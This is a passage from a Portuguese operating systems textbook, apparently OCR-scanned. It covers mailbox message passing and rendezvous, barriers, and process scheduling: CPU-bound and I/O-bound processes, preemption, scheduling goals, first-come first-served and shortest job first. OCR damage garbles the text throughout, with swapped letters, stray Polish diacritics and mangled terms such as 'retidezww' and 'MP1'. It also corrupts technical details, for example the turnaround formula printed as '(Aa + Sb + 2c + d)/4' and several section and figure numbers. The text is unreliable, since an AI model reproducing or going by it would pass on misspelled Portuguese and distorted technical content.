as catxas postais, nao os processos. Ao ten lar em iar para 
uma caixa posiał que esteja cheia, um processo e suspenso 
ale que uma mensagem seja removida daquela eaixa posiał 
e de lugar a uma oova. 

Para oproblema produlor-consumidor, tanio o produ- 
tor ąuanto o consumidor criariam eaixas postais suficienle¬ 
nienie grandes para comer jV mensagens, O prodmor envia- 
ria mensagens contendo dados a caixa posiał do consumidor 
c este ma udarła mensagens vazias para a caixa postał do 
produtor. O mecanismo de buffer das caixas postais e bas- 
tanie simplcs: a caixa postai de destmo eoniem mensagens 
enviadas ao processo de deslino, mas ainda nao acciias. 

O outro extremo das caixas postais e di mi nar todo o 
armazenamento lemporario. Quando se opia por esse 
caminho, se o send e emilido a mes do receive, o processo 
emissor pcrmanece bloąueado ate que ocorra o receive, mo¬ 
ment o no qual a mensagem pode ser copiada diretamente 
do emissor para o receptor, sem armazenamento internie- 
diano. Da mes ma maneira, se o receive e emitido antes, o 
receptor e błoqueado ate que ocorra um send, Essa estrale- 
gia e mais conhecida como retidezww 2 . Ela e mais facił de 
implcmemar que um csąuema de armazenamento dc men- 
sagens, mas ć menos flexfvel, pois o emissor c o receptor sao 
foręadosa exeaitar de maneira interdependente, 

A troca de mensagens e bastante usada em sistemas 
de programaęao paralela. Um sistema de troca de men- 


2, Exprcsslt) cm Iranećs pan cnomtru marado' (jN.T.). 
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sagens bem eon hec ido, por exemplo, e o MP1 ( message- 
-passing interface — interface de troca de mensagem), 
amplamente usado em computaęao cientflka. Para mais 
informaęóes sobre cle, veja, por exemplo, Gropp et ai. 
(1994) c Sniret al. (1996), 

2.5.91 Barreiras 

Nosso ultimo mccanismo dc sincronizaęao c dirigido 
aos grupos de processos em vez de siiuaęoes qne envolvem 
dois processos do lipo produlor-comumidon Algumas apłb 
caęoes sao divididas em fases c icm como regra que nenhum 
processo pode avanęar para a próxima łase ate que lodos os 
processos estejam prom os a fazc-lo. Isso pode ser consegui- 
do por meio da colocaęao dc unia barreira no finał dc cada 
fasę, Quando alcanęa a barreira, um proccsso perrnanece 
błoąucado aić que lodos os processos akancem a barrei- 
ra. A operaęao de u ma barrdra e ilusirada na Figura 2.30. 

Na Figura 2.30(a), vemos quatro processos chegando a 
u ma barreira, o quc significa quc des estao apenas compii- 
lando c a i uda na o atingiram o finał da fasę atual. Dcpois dc 
urn tempo, o primeiro proccsso tcmiina loda a computaęao 
airibuida a dc para a primeira fasc. Ele entao cxccuta a pi i- 
miiiva barrier, em geral por inicrmedio da chamada a urna 
rotina dc biblioleca. O proccsso e, emao, suspenso. Mais 
tarde, a primeira fasc e terminada por urn segundo e dcpois 
por umie rccir o proccsso, queiambemexecutamaprlmiLiva 
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Figura 2,30 Uso de uma barreira. (a) Processos se 
aproximando de uma barreira. (b) Todos os processos, exceto 
urn, estao bloqueados pela barreira. (c) Ouando o ultimo 
processo chega a barreira, todos passam por ela. 


barrier. Essa situaęao e ilusirada na Figura 230 (b). Por fim, 
ąuando o ultimo proccsso, C atinge a barrdra, todos os pro¬ 
cessos sao liberados, tonforme i lustra do na Figura 230 (c), 
Como cxemplo de uma situ a ęa o quc reąucr barreiras, 
considere urn problema ifpico de rdaxaęao, da bsica ou da 
engenharia. Ha cni geral uma matriz que eon tern alguns 
vałores iniciais. Os valores padem representar tempera tur as 
em varios pontos de uma płaca de metal. O objetivo pode 
ser calcu lar quanto tempo leva para quc o efeito dc uma 
chama localizada em urn canto se propague por toda a płaca. 

Comeęando com os valores atuais, uma transformaęao 
e aplieada a matriz para obter uma segumla versao da ma- 
Iriz — por cxemplo, aplicando-se as leis da termodinamka 
para vcrificar todas as temperaturas cm uin insianle T mais 
tarde. O proccsso e, entao, repet i do varias vezes e fornece 
as temperaturas nos pornos de amostragem como inna fun- 
ęao do tempo, a medida que a płaca e aąuecida, O algoritmo 
produz, portan to, uma serie de matrizes ao longo do tempo, 
Agora, imagine quc a matriz seja muito grandę (diga- 
mos, nm rnilhao por mn milhao), exigindo o uso de proces- 
samento paralelo (possivelmcntc cm um sistema mullipro- 
cessador) para aumentar a vcłoddade do calculo. Processos 
diferentes traballiam com diferemes part es da matriz, cal- 
cułando os elementos da nova matriz a partir dos valores 
anteriores e dc acordo com as leis da fisi ca. Contudo, um 
proccsso só pode comeęar uma iieraęao n + 1 quando a 
i terasa o n terminar, isto e, ąuando lodos os processos ler- 
minarem sens iraballios atuais. O meio de chegar a esse 
objetiyo e programar cada proccsso de maneira que de 
execule unia operaęao barrierdepois que lerminar sua parte 
da ileraęao, Quando todos tiverem fcilo sua parte, a nova 
matriz (a entrada para a próxima ileraęao) estara proma e 
todos os processos sera o simullanea menie liberados para 
inidalizara próxima iteraęao. 


»JEI Escalonamento _ 

Quando um computador e mułtiprogramado, ele mul¬ 
ta s vezes tern mulliplos processos ou threads quc compe- 
tern pela CPU ao mesmo tempo. Essa situaęao ocorre sem- 
pre que dois ou mais processos estao simultaneamenie no 
estado pronto. Se someme uma CPU se encontrar dispo- 
mvei devcra ser feita uma escolha de qual proccsso exe- 
cutara em seguida. A parte do sistema operacional que faz 
a escolha c chamada de escaionador, e o algoritmo que 
de usa e o algoritmo de escalonamento, Esses tópicos 
formam o assunto das próximas seęoes. 

Muitos dos próbie mas que se aplicam ao escalonamen- 
to de processos tambem sao yalidos para o escalonamento 
de threads, embora haja diferenęas. Quando o nucleo ge^ 
rencia threads, o escalonamento normalmente e feito por 
thread, dando pouca ou nenhuma atenęao ao proccsso ao 
qual o thread pcrtcnce. Inicialmente nos eon centra rem os 
cm ąuestóes de escalonamento que sc aplicam tanto a pro¬ 
cessos como a threads. Em seguida estudarcmos cspecifica- 
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nieme o escalonamenio de ihreads e alguns dos problemas 
exclusivos que suscila. Lidaremos coni chips multinudeo 
no Capftulo 8, 

2-4.1 I Introducao ao escalonamento 

De voita aos vdhos Lempos dos sistemas em lote, com a 
emrada na forma cic imagens de cartoes em u ma fila magne- 
tiea, o algoritmo de escalonamento era simples; apenas 
execme a próxima tarcia que esia na lita. Com os sistemas 
mu lii próg rama dos, o algoritmo de escalonamento tornou- 
-se mais complexo porque, em geral, havia varios usua- 
rios esperando por um servięo. Alguns computadores de 
grandę porte ainda combinam servic;os em lote e de tempo 
conipartilhado, exigindo assim que o escalonador decida se 
nma tarefa em lote on um u su ario interatwo em um termi¬ 
nal deve ser atendido. {Atenie para o seguintc: urna tarefa 
cm lote pode ser unia requisięao para executar u ma suces- 
sao de varios programas, mas, para esta seęao, vamos supor 
quescja urna requislęaopara cxecuiar um unicoprograma.) 
Como o lempo de CPU e um recurso escasso nessas maqui- 
nas r um bom escalonador pode fazer urna grandę diferen- 
qa no desempenlio observado e na satisfaęao do usuario. 
Conseąuentemente, muito se fez tendo em vista desenvol- 
ver algoritmos de escalonamento intellgentes e efidentes. 

Com o advento dos computadores pessoais, a silna- 
ęao mudou de ditas maneiras, Primeiro, na maior parte do 
tempo existe apenas um processo ativo. £ improvavel que 
um usuario esteja, simultaneamente, emrando com um 
documemo em um processador de textos e compilando 
u ni programa em segundo piano. Quando o usuario dlgita 
u ni comando para o processador de textos, o escalonador 
nao precisa trabalhar muito para perceber qual processo 
cxccuiar — o processador dc textos c o unico candidato. 

Hm segundo lugar, os computadores, com o passar dos 
a nos, li ca ram tao mais rapidos que a CPU raramcnte chc- 
gara a ser um recurso escasso. A maioria dos programas 
para computadores pessoais e iimitada pela veloddade com 
que o usuario pode entrar dados (digitando ou ciicando), e 
nao pela taxa na qual a CPU e capaz de processa-los, Ate os 
compiladores — grandes consumidores de ciclos de CPU no 
passado — aiualmente tevam, no maximo, alguns segun- 
dos. Mesmo quando dois programas estiverem exeauando 
de modo simultaneo — como um processador de textos e 
urna planilha —, dificilmente imponara qual eomeęa pri- 
inciro, ja quc o usuario csiara esperando, provavelmenie, 
que ambos terminem. Como conseąuencia, o escalona- 
mento nao e tao importanre em PCs simples. Claro, ha apli- 
caęócs que pratieamentc csgotani a CPU: exibir uma hora 
de vidco de alta resdluęao pode exigir processamcnto dc 
imagens de altissima capacidade para Udar com cada um 
dos 108 mil quadros em NTSC {90 mil no PAL), mas essas 
aplicaęoes sao exeeęoes, nao a regra. 

Quando nos conccntramos em senidores c cstaęocs dc 
trabalho de alto desempenho cm rede, a siuiaęao muda. 


Nesse caso, e conium haver multiplos processos competin- 
do pela CPU, e, portanlo, o escalonamento lorna-se im¬ 
port antę novamente. Por exemplo, quando a CPU prerisar 
dccidir entre executar um processo que reiine estarfsticas 
diarias e um quc atendc as solicitaęocs dos usuarios, estes 
fkarao muito mais satisfeitos se o ultimo tiver precedenda 
na CPU, 

Alem de escolher o processo ceno para execular, o es- 
calonador tambem deve se preocupar em fazer um uso efi- 
ciente da CPU, pois chavear processos e muito custoso* De 
inTcio, deve ocorrcr um chaveamcnio do modo de usuario 
para o modo nucleo, Depois, o estado atual do processo 
deve ser salvo, armazetiando-se i udusive seus registra- 
dores na tabela de processos, para quc possani ser recar- 
regados posteriomientc. Em muilos sistemas, o mapa dc 
memória (por cxemplo, os bils dc referenda a mcinória 
na tabela de paginas) tambem deve ser salvo, Em segui- 
da, um novo processo precisa ser sekcionado pela execu- 
ęao do algoritmo de escalonamenio. Depois disso, a MM U 
(memory managment unit — u ni da de de gerenciamento de 
memória) tern de ser recarregada com o mapa de memó- 
ria do novo processo. Por firn, o novo processo precisa ser 
iniciado. Alem disso tu do, o chaveamento do processo nor- 
malmente mvalida toda a memória cache, foręando-a a ser 
dinamicameruc recarregada da memória ptincipa! por duas 
vezes (ao entrar no nucleo c ao sair deie). De modo gcral, 
rcalizar niuitos chaveamentos de processos por segundo 
pode comprometer unia grandę quantidade do tempo dc 
CPU; portauto, todo cuidado e pouco, 

Comportamento do processo 

Quase todos os processos alternam surtos de compti- 
taęao com requisięóes de E/S (de disco), conforme mostra 
a Figura 2.31, Em geral a CPU exemta indefinidamente 
e entao e feita uma chamada de sistema para ler de um 
arquivo ou escrever nele, Quando a chamada de sistema 
termina, a CPU computa novamente ale que ela requisite 
ou ten ha de escrever mais dados, e assim continua. Perceba 
que algumas atmdades de E/S comam como computaęao. 
Por exemplo, ąuando a CPU copia bits para uma RAM de 
video a firn de amalizar a tela, ela esta computando, nao fa- 
zendo E/S, pois a CPU se encontra em uso. E/S, nesse sen- 
lido, e o que ocorre quando um processo emra no estado 
bloqueado esperando que um dispositivo externo termine 
o que esta fazendo* 

O que e importante observar na Figiua 2.31 e que al¬ 
guns processos, como os da Figura 2.31 (a), gastam a maior 
parie do tempo computando, enąuanto outros, como os da 
Figura 2.31 (b), passam a maior parte de seu tempo esperan¬ 
do E/S. Os primeiros sao chamados limitados pela CPU 
(iompute hound ou CPU-bowid): os liltimos sao os liniita- 
dos pela E/S (I/O-hound). Os processos limitados pela CPU 
apresentam, em geral, longos surtos de uso da CPU e espo- 
radicas esperas por H/S: ja os processos limitados por E/S 
tern pequenos surtos de uso da CPU e esperas frequentes 
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I Figura 2.31 Usos de surtos de CPU se aEternam com perfodos de espera por E/S. (a) Um processo orientado a CPU. 
(b) Um processo orientado a E/S. 


por E/S, Notę que o falor Principal e o tamanho do su no dc 
CPU, nao o tamanho do surto dc E/S* Os processos orienta- 
dos a E/S sao assim chamados porque, emre inna reqimięao 
e otura por E/S, eles nao realizam multa compuiaęao, nao 
porque tenham requisięoes por E/S especialnieme demora- 
das. O tempo para a leitura de um bloco de disco e sempre 
o mesmo, independentemente do quanto demore processar 
os da dos que chegam depois. 

Convem obsen ar que, a medida quc as CPUs se tor- 
nain mais rapklas, os processos tendem a ficar mais limita- 
dos por E/S. Esse efeito ocorre porque as CPUs estao fican- 
do muito mais rapidas que os discos. Como conseąuencia, 
o escalonamento de processos orientados a E/S devera ser 
um assunro mais import antę no futuro. A ideia basica e 
que, se um processo orientado a E/S quiser executar, essa 
oportunidade deve ser rapidamente dada a ele, pois assim 
cle cxccutara suas rcquisię6cs dc disco, mantcndo o disco 
ocupado. Como vimos na Figura 2,4, quando os proces¬ 
sos sao orientados a E/S, sao necessarios alguns ddes para 
maniera CPU totalmeme ocupada. 

Quando escalonar 

Um lópico funda niemal, reladonado a o escalonamen- 
to, e o moment o certo de to mar as dedsóes de es cal on ar, fi 
daro que ha urna variedade de situaęoes nas quais o esca¬ 
lonamemo e necessario, Pri metro, ąuando se aria um novo 
processo, e neccssario tomar unia de cisi o emre exeaitar o 
processo pal ou o processo fil ho. Como ambos os processos 
estao no estado pronto, essa e urna decisao norma 1 de esca¬ 
lonamemo e pode levar a escolha de um ou de outro — isto 
e, o escalonador pode escolher legilimamente executar o 
pa i ou o filho. 

Em segimdo lugar, urna decisao de escalonamento 
deve ser tomada ao tennino de um processo. Como o pro¬ 
cesso nao pode executar mais (ja que cle nao existe mais), 
algum outro processo deve ser escolhido entre os processos 
prontos* Se nenhurn processo esiiver p ront o, e executado 
tim processo ocioso gerado pelo sistema. 

Em terceiro lugar, quando um processo bloqueia para 
E/S, sobre um semafora ou por al gunia o u na razi o, outro 


processo precisa ser sdecionado para executar. O motivo 
do bloąueio pode, algumas vezes, influenciar na escolha. 
Por exemplo, se /l for um processo importante e esdver 
esperando B sair de sua regiao crftica, deixar B executar 
em seguida permitira que ele saia de sua regiao crftica e, 
portanto, permite que A contimie. O problema, contudo, 
e que geralmente o escalonador nao possui a informaęao 
necessaria para considerar essa dependencia. 

Em quarto lugar, quando ocorre urna interrupęao de 
E/S, pode-se tomar u ma decisao de escalonamemo. Se a 
imerrupęao vem de um dispositivo de E/S que acabou de 
fazer seu irabalho, o processo que estava bloqueado, espe¬ 
rando pela E/S, pode agora ficar pronto para execuęaa. fi o 
escalonador quem de ci de se executa o processo que a ca bou 
de ficar pronto, o processo qtie estava executando no mo¬ 
mentu da interrupęao ou algum terceiro processo. 

Se um hardware de relógio fornece imerrupęoes pe- 
riódicas a 50 Hz, 60 Hz ou alguma outra freąuencia, urna 
decisao de escalonamento pode ser tornada a cada inier- 
rupęao de relógio ou a cada k -es i ma interrupęao de relógio. 
Os algoritmos de escalonamento podem ser dmdidos em 
duas categorias quanto ao modo como tratam essas inter- 
rupęoes. Um algoritnio dc escalonamento nao preerrtp- 
tivo escolhc um processo para executar e, entao, o dcixa 
cxecutar ate que seja bloqueado (a espera de E/S ou de 
um outro processo) ou ate que ele yoluntariamente libere 
a CPU, Mesmo quc ele execute por ho ras, nao sera com- 
pulsoriamente suspenso. Na verdade, nenhuma dedsao de 
escalonamento e tornada du ranie as iirierrupęoes dc reló¬ 
gio, Depois quc o processamcnto da interrupęao de relógio 
termina, o processo que estava executando antes da inter¬ 
rupęao prossegue ate aca bar, a menos que um processo de 
prioridade mais alta esteja esperando por um tempo de es¬ 
pera agora satisfeito* 

Por outro lado, um algoritnio de escalonamento pre- 
emptivo escolhe um processo e o deixa em execuęao por 
um tempo maxhno fixado. Se ainda estiverexecutando ao 
finał desse intervalo de tempo, o processo sera suspenso e 
o escalonador escolhera outro processo para executar (se 
houver algum disponivel). O escalonamento preemptivo 
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reąuer a exisiencia de uma interrupęao de relógia ao firn 
do intervalo de lempo para que o controle sobre a CPU seja 
devolvido ao escalonador. Se nao houver relógio dispom- 
vd, o escalonamento nao preemptivo sera a imica opęao. 

Categorias de algoritmos de escalonamento 

£ claro que, para ambientes difcrcntes, sao necessa- 
lios difererues algoritmos de escaionamemo, Essa situ a ęa o 
ocorre porque diferemes areas de aplicaęao (e dikrentes li- 
pos de sistemas operacionais) tern objetivos diferemes. Em 
ouiras palavras, o que deve ser otiniizado pelo escalonador 
nao ć o mesmo para lodos os sistemas, Tres ambiemes me- 
recem distinęao; 

1. Lotc. 

2. Intcrativo. 

3. Tempo rcal. 

Os sistemas em lote ainda sao amplamente iitiltzados 
pelas empresas para lolhas de pagamento, esloąne, conias 
a receber, conias a pagar, calculo dejuros (em bancos), pro- 
cessamento de pedidos de indenizaęao (em companhias de 
seguros) e ouiras tarefas periódicas. Nos sistemas em lote 
nao ha, cm scus terminais, u su a ri os cspcrando impacicn- 
tes por uma resposta rapida. Consequentemenie, os algo- 
ritnios nao preemplivos ou prcemptivos com longo intcr- 
valo de tempo para cada processo sao, em geral, aedtaveis. 
Essa taiica reduz os ehaveamemos entre processos e assim 
mcthora o descmpenho, Na verdade, os algoritmos de lote 
sao bastante comuns e muitas vezcs aplicaveis a outras si- 
tuaęoes tambem, o que torna imponante estuda-Ios, ate 
para pessoas que nao estejam envolvidas em comptiiaęao 
central corporativa. 

Em urn ambiente com usuarios interativos, a preempęao 
e essencial para evitar que mu processo se aposse da CPU e, 
com isso, negutr servięo aos outros, Mesmo que nenhum 
processo exeaite intencionalmente para sempre, uma fa- 


llia em um programa pode levar urn processo a impedir 
indefinidamente que todos os outros executem. A preemp¬ 
ęao e necessaria para impedir esse comportamento. Os ser- 
yidores tambem caem nessa categoria, visto que norma! - 
m en te scrvcm a usuarios (re molos) mul tipi os, todos miii to 
apressados. 

Em sistemas com restrięoes de tempo real, a preempęao e, 
estranhameiite, algumas vezes desnece ssana, pois os pro¬ 
cessos sabem que nao podem executar por longos periodos 
e, em geral, fazem seus trabalhos e bloąueiam rapidamen- 
te. A diferenęa com relaęao aos sistemas interativos e que 
os sistemas dc tempo rcal executam apenas programas quc 
visam ao progresso da aplicaęao, Ja os sistemas intcrativos 
sao dc propósito geral e podem executar programas arbi- 
trarios nao cooperativos ou ale mal-inlentionados. 

Objęli vos do algoritmo de escalonamento 

Para projetarum algorilmo de escalonamento, e neces- 
sario teralguma ideia do quc um bom algoritmodeve fazer, 
Alguns objetivos dependcm do ambiente (lote, mteraiivo 
ou tempo reai), mas ha tambem aqueles que sao desejavcis 
para todos os casos. Alguns objetivos sao relacionados na 
Tabela 2.8. Discutiremos łsso logo a seguir. 

Em qualqucr drcunstanda, justięa c algo imponante, 
Processos semelhanies devcm ter servięos semelhantes, 
Nao e jusso dar mais tempo de CPU a um processo do que a 
outro equiva lenie, E claro que categorias diferemes de pro¬ 
cessos podem ser iratadas de modo mu i to diverso. Pensc 
no controle de seguranęa e na fol ha de pagamemo de um 
centro de computaęao de uma ustna nudear. 

De algurna maneira reladonada a justięa esla o cum- 
primento das politicas do sistema, Se a polftica local estabe- 
lece que os processos do controle de seguranęa execuiam 
quando ąmserem, mesmo que isso signslupie que a folba 
de pagamemo atrasc 30 segundos, o escalonador deve as- 
segurar que essa polftica seja cumprida. 


Todos os sistemas 

Justięa — dar a cada processo uma poręao justa da CPU 
Aplicaęao da politica — verificar se a politica estabelecida e cumprida 
Equilibrio — manter ocupadas todas as partes do sistema 

Sistemas em lote 

Vazao [throughpuf) — rnarimizar o numero de la ref as por hora 
Tempo de retom o minimizar o tempo entre a submissao e o termino 
Utilizaęao de CPU — manter a CPU ocupada o tempo todo 

Sistemas interativos 

Tempo de resposta — responder rapidamente as requisięóos 
Proporcionalidade — satisfazer &s expectativas dos usuartos 

Sistemas de tempo real 

Cumprimento dos prazos — eritar a perda de dados 

Previsibilidade — evitar a degradaęao da qualidade em sistemas multtmidia 


I Tabela 2.8 Alguns objetivos do algoritmo de escalonamento sob diferentes circunstancias. 
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Outro objetivo geral e ma n ter, ąuando posswel, todas 
as partes do sistema ocupadas. Se a CPU e os demais dispo- 
sitivos de E/S puderem ser mantidos era execuęao o tempo 
todo, mais trabalho por segundo sera fdto do que se algum 
dos componentes cstiver orioso. Em um sistema cm lote, 
por exemplo r o escalonador tern o controle dc quais tarefas 
sao trazidos para a memória para exccutar. Ć melhor ter 
juntos na memória alguns processos limilados pda CPU c 
outros limilados por E/S do que carregar todas as tarefas 1i- 
miiadas peta CPU primeiro e quando terminarern, carregar 
e executar todas as tarefas limitadas por E/S. Se a ultima 
estrategia for osada, quando os processos orientados a CPU 
estiverem executando, disputarao a CPU e, assim, o disco 
Ikara ocioso. Em seguida, quando as tarefas limitadas por 
E/S exeaitarem r disputarao o disco e a CPU sc encontra- 
ra ociosa. E melhor manter o sistema todo executando de 
urna vcz formulando-sc cuidadosanicntc cssa mislura de 
processos. 

Os gerentes de grandes centros de compntaęao — 
que executam rnuitas tarefas em lote — observam, em 
geral, tres meiricas para verificar se os sistemas deles es- 
tao execiitando bem on nao: vazao, tempo de retorno 
e utilizaęao da CPU. Vazao e o numero dc tarefas por 
hora quc o sistema ter mina* Considerando tu do o quc foi 
discutido, terminar 50 tarefas por hora e melhor do quc 
terminal 40 no mesnio periodo, O tempo de retorno 
e esta listka menie o tempo medio do momento em quc 
u ma tarefa em lote e submetido ale o momento em que 
ele e terminado. Ele indica q u anto tempo, em media, o 
u su ario tem de esperar peio firn de um trabalho. Aqui a 
regra e: quanto menor, melhor. 

Um algoritmo de escalonamento quc maximize a va- 
zao pode nao necessariamenle minimizar o tempo de re¬ 
torno. Por txempIo, dada urna mistma de tarefas curtas e 
longas, um escalonador que exeeute sempre tarefas curtas 
e iiurica tarefas longas pode conseguir u ma excelente va- 
zao (rnuitas tarefas curtas por hora), mas a custa de um 
enornie tempo de retorno para as tarefas longas. Se as tare¬ 
fas curtas mantiverem urna taxa de chegada constante, as 
tarefas longas poderao nunca execu tar, tornando o tempo 
medio dc retorno infinito, embora atingindo alta vazao. 

A utilizaęao da CPU tambem e rnuitas vezes usada 
como para metro em sistemas em lote. Na verdade, esse 
nao e um bom para metro. O que realnienie imeressa e 
ąuantas tarefas por hora saem do sistema (vazao) e quan- 
to tempo leva para receber o resultado do trabalho (tem¬ 
po de retorno). Tomar a utilizaęao da CPU como medida e 
o mesmo que ava!iar um carro pclo numero de giros quc 
seu motor da a ca da hora. Por outro lado, saber ąuando a 
utilizaęao da CPU esta sc aproximaodo dc 100 por ccnto 
e util para identilkar o momento de obter mais potencia 
para o computador* 

Para sistemas interativos, aplicam-se objetivos diferen- 
tes. O quc importa e minimizar o tempo de resposta, isto 


e, o tempo entre a emissao de um comando e a obtenęao do 
resultado. Em um computador pessoal, no qual esta sendo 
executado um processo em segundo piano (por exemplo, 
lendo e armazenartdo mensagens dc correio elctrónico da 
rede), urna reąirisięao dc usuario, para inicializar um pro- 
grama ou abrir um arquivo, dcvcria ter prccedćnrin sobrc 
o trabalho em segundo piano, Atcndcr antes a todas as rc- 
ąuisięoes interativas sera considerado um bom servięo* 

Uma ąuestao relacionada a esse tópico e a chamada 
proporcionalidade. Os usuarios tem uma intuięao (mas 
rnuitas vezes errada) de quanto tempo as coisas dcvcm du- 
rai\ Quando uma requisięao tida como complexa dcmo- 
ra, os usuarios aceitam isso, mas, ąuando a dcmora ocorrc 
com uma reąuisięao considcrada simpies, os usuarios ficam 
irritados* Por cxemplo, se, ao cliear em um fcone que i ni¬ 
cią o envjo de um fax, sao necessarios 60 segundos para 
conclm-lo, o u su ario provavehneme encarara isso como 
inevitavel porque nao espera que um fax seja enviado em 
cinco segundos. 

Por outro lado, ąuando o usuario clicar cm um fcone 
para interromper a conexao telcfónica após o envio do fax, 
ele tem cxpectativas diferentes. Se nao liver sido concluf- 
do após 30 segundos, o usuario provavdmeme comeęara a 
redamar e, após 60 segundos, esiara espumando de raiva. 
Esse comportamento e causado pela inevitavel comparaęao 
que o usuario faz que realizar uma chamada telefonica e 
passar um fax deveria demorar muito mais do que desligar 
o telefone. Em alguns casos (como esse), o escalonador nao 
pode fazer nada com relaęao ao tempo de resposta, mas em 
outros casos sim r csperialmcntc liaąudes cm quc o a traso 
c decorrentc de uma ma cscolha da orderu dos processos. 

Sistemas de tempo real tem propriedades diferemes 
dos sistemas interativos e, portanto, ob]el3vos diferemes. 
Eles sao caracterizados por prazos que devem — ou pelo 
men os deveriam — ser cumpridos* Por exemplo, em um 
computador encarregado de contro lar um dispositivo que 
produz da dos a uma taxa constante, urna fal ha ao executar 
o processo dc colcta dc dados cm tempo habil pode rcsullar 
na perda de dados. Assim, a priiiripal exigcncia de um sis- 
tema dc tempo real e cumprir lodos os prazos (ou a maior 
parte deles), 

Em alguns sistemas de tempo real esperialmente na- 
qudes que cnvolvcm multimfdia, a previsibilidade e im- 
portante, Deixar de cumprir um prazo ocasional nao e 
fatal mas, se o processo de audio, por exemplo, executar 
enaticamente, a ąualidade do som vai deteriorar rapido. O 
vfdeo tambem e um problenia, mas o ouvido e muito mais 
sensivel a atrasos que a visao. Para evitar esse probiema, o 
escalonamento de processos deve ser alta menie previsfvel 
e reguła u Ainda neste capfluio, estudaremos os algoritmos 
de escalonamento em lote e interativos, mas adiaremos a 
maior parte de nosso estudo sobre o escalonamento em 
tempo real para o Capftulo 7, que trata de sistemas opera- 
cionais multimfdia. 
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2-4,21 Escalonamento em sistemas em lote 

Ś chegada a hora dc passa r dos topi cos gerais de esca¬ 
lonamento para os algoritmos especfficos desse processo. 
Nesta scęao, csuidaremos os algoritmos usados em siste¬ 
mas em lote. Em seguida, veremos sistemas interatfros e 
de tempo reaL Cotwem ressallar que alguns algoritmos sao 
usados tamo em sistemas em lote quanto em sistemas in- 
lcrativos. Esscs serao c stu da dos dcpois* Agora, o foco sera 
mantido sobre algoritmos adeąuados somente a sistemas 
em lote. 

Primeiro a che gar, primeiro a ser $ervido 

Provavelmente o mais simples algoriimo dc escalo- 
namento seja o nao preemptivo primeiro a chegar, pri¬ 
meiro a ser servido (first eonie, first served — FCFS). Com 
esse algoriimo, a CPU e atribitida aos processos na ordcm 
em que des a reąuisitam. Basicamente, ha uma fila unica 
dc processos prontos. Quando a primeira tarefa entra no 
sistema, logo quando chega de manii a, e iniciado tmedia- 
tamente e autorizado a executar poi ąuanto tempo ąueira. 
Ele nao e interrompido porque esta sendo executado ha 
muito tempo, A medida que chegam asoutras tarefas, des 
sao encamitihados para o fim da lila. Quando o processo 
em execuęao e bloąueado, o primeiro processo na fila e o 
próximo a executar, Quando um processo bloqueado fica 
promo —-assimeomo uma tarcia que acabou de chegar—, 
de c posto no firn da fila. 

A grandę vantagem desse algoriimo e que ele e faeil 
de emender e igualmente facil de prograsnar. E tambem 
um algoriimo justo, asslm como e justo dcstiiiar escassos 
ingressos para evcmos cspoilivos on musicais para as pes- 
soas quc estejam dispostas a ficar na lila dcsde as 2 da ma- 
drugada* Com esse algoriimo, uma unica lista encadeada 
controla todos os processos prontos, Adidonar uma nova 
tarefa on um processo desbloąueado requcr apenas a inser- 
ęao dele tio finał da fila. O que poderia ser mais simples dc 
entender e implementar? 

Infelizmente, o algoriimo primeiro a chegar, primeiro a 
ser smado apresenta uma grandę desvantagem, i ma ginę um 
processo oriemado a computaęao que execuic du ranie um 
segundo por vez e muilos omros processos limitados por 
E/S que usem pouco tempo de CPU, mas que precisem i ca¬ 
li zar, cada um, mil leituras de disco a mes de terminar. O 
processo oriemado a com p maca o execma por um segundo 
e entao Ić um bloco de disco (bJoąuela). Com esse proces¬ 
so bloąueado a espera de E/S, todos os outros processos 
limitados por E/$ execntam e iniciam as letturas de disco. 
Quando o processo oriemado a computaęao obtem sen blo¬ 
co de dados (desbloąueia), ele execma por mais um segun¬ 
do, segtiido novamente por todos os processos limitados 
por E/S, em uma rapida sucessao. 

O resultado ltquido e que cada um dos processos 11- 
mitados por E/S le um bloco por segundo e, poi tanio, de- 
morara mil segundos para terminar, Com um algoriimo 


de escalonamento que causasse a preempęao do processo 
oriemado a computaęao a cada dez milissegundos (em vez 
de a cada um segundo), os processos de E/S terminariam 
em dez segundos, e nao em mil segundos, sem a trasa r tan¬ 
io o processo orientado a computaęao* 

Tarefa mais curta primeiro 

Vejamos um oturo algoriimo em lote nao preemptlvo 
que supoe como previamente conheddos todos os tempos 
dc exccuęao, Em uma companhia de seguros, por exemplo r 
as pessoas podem prever, com basta nic predsao, ąuanto 
tempo sera necessario para execuiar um lote de mli soli- 
ritaęoes, ja que mn trabalho similar e feito todos os dias* 
Quando varias tarefas igualmente importames estivcrem 
postados na fila de entra da a espera de serem jjniciados, o es- 
calonador escolhe a tarefa mais curto primeiro (shortest 
job first). Veja a Figura 2.32. Kela encomramos ąuatro tare¬ 
fas — A, B, Cc D — com sens respeclIvos tempos de execu- 
ęao — 8, 4, 4 e 4 minut os, iespeaivamente. Ao execuia-los 
nessa ordcm, o tempo de ret orno para A e de oito minutos, 
para B c de 12 minut os, para C e de 16 minutos c para D c 
dc 20 minutos, o quc resulta cm uma media de 14 minutos* 

Consideremos agora a execuęao desses ąuatro tarefas a 
partirdo algoriimo tarefa mai$ curta primeiro, conforme ilus¬ 
tracjo na Figura 2.32(b). Os tempos de retorno sao agora 4, 
8, 12 c 20 minutos, com uma media de 11 minutos. A tarefa 
mais curta primeiro par ccc ótimo, nao? Comidere o caso de 
ąuatro tarefas, com tempos dc execuęao a , b, cc d, rcspecti- 
vamcmc. A primeira tarefa termin a no tempo a , o segundo 
termina no tempo a + b c assim por dianie, O tempo niedio 
de retorno e (Aa + Sb + 2c + d)/4. E daro que a contribui 
mais para a media que os outros tempos; porta mo, ele de- 
veria ser a tarefa mais curto, com o b depois, entao o c c, 
por lim, o d —~sendo este o mais demorado e que afeta so- 
menie seu próprio tempo de retorno. O mes ni o argumento 
se aplica igualmente bem a qualquer nu mero dc tarefas. 

Convem observar que a tarefa mais aula primeiro e ade- 
quado somente para situaęoes em que loclas as tarefas este¬ 
jam dispomVeis simultanea menie. Como um contraexemplo, 
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I Figura 2.32 Um exemplo do escalonamento tarefa mais 
curta primeiro , (a) Execuęao de quatro tarefas na ordem 
originaL (b) Execuęśo na ordem tarefa mais curta primeiro ;■ 
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considere cinco larefas, de A a E, com temp os de execuęao 
2, 4, 1, 1 e l r respectivamente. Sens tempos de che gada 
sao 0, 0, 3, 3 e 3. De irnrio, somente A ou B podem ser es- 
colhidas, ja que os mi tras tres tarefas ainda nao dicgaram. 
Usando a ta ref a mais curto primeiro, exccuraremos as tarefas 
na ot dem A f B, C D, E para um tempo medio dc espera dc 
4,6. Contudo, cxeciita-los na ord cm 8, C, O. E, A implita 
um tempo medio dc espera de 4,4, 

